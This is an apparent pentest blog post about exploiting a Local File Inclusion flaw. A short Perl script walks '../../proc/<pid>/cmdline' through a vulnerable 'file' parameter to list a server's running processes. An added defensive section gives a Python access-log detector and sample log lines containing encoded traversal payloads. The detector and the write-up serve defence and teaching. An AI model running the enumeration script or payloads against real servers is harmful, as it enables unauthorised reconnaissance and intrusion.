Process command line enumeration using LFI



This week during a pentest I discovered a website vulnerable to Local File Inclusion (LFI). As I wanted to discover as much information as possible about the system, I decided to retrieve the running processes and the command lines used to execute them. With this I intended to discover more services and paths in the system.

I wrote a very simple Perl program that can easily be adapted to other scenarios:

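#!/usr/bin/perl -w
use LWP;
my $browser = LWP::UserAgent->new;
# Vulnerable file parameter, traversing up to /proc/
my $url = 'https://URL/load?file=../../proc/';
# Walk candidate PIDs and request /proc/<pid>/cmdline for each one
for (my $i = 0; $i < 9500; $i++) {
    my $response = $browser->get( $url.$i."/cmdline" );
    # Skip PIDs that return an empty body
    if ($response->content !~ m/^$/i) {
        print $i . " : " . $response->content . "\n";
    }
}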
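Seen from the server side, the loop above leaves a recognisable trace in the access log: one client requesting `/proc/<pid>/cmdline` for many PIDs through the file parameter. The Python detector below is an added example, not part of the original post; the log lines are constructed, and the combined log format, the function names and the threshold of three distinct PIDs are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in combined log format (RFC 5737 test addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /load?file=../../proc/1/cmdline HTTP/1.1" 200 12
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /load?file=../../proc/2/cmdline HTTP/1.1" 200 0
203.0.113.7 - - [10/Oct/2023:13:55:02 +0000] "GET /load?file=..%2f..%2fproc%2f3%2fcmdline HTTP/1.1" 200 0
203.0.113.7 - - [10/Oct/2023:13:55:02 +0000] "GET /load?file=..%252f..%252fproc%252f4%252fcmdline HTTP/1.1" 200 31
198.51.100.20 - - [10/Oct/2023:13:56:10 +0000] "GET /load?file=report.pdf HTTP/1.1" 200 48213
198.51.100.20 - - [10/Oct/2023:13:56:15 +0000] "GET /docs/proc/overview HTTP/1.1" 200 901
"""

# Client address and request target from one log line.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A parameter value that ends up pointing at /proc/<pid>/cmdline.
PROC_CMDLINE = re.compile(r'(?:^|/)proc/(\d+|self)/cmdline\b')


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252f) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def proc_probes(log_text):
    """Map each client to the set of PIDs whose cmdline it requested."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # Inspect every query parameter, not only one named "file".
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            found = PROC_CMDLINE.search(fully_decode(value).replace("\\", "/"))
            if found:
                hits[client].add(found.group(1))
    return dict(hits)


def enumerating_clients(log_text, min_pids=3):
    """Clients that probed at least min_pids distinct PIDs (assumed threshold)."""
    return sorted(c for c, pids in proc_probes(log_text).items() if len(pids) >= min_pids)
```

A single hit on `/proc/<pid>/cmdline` through a file parameter is already worth an alert; the per-client PID count separates a one-off probe from a full enumeration run.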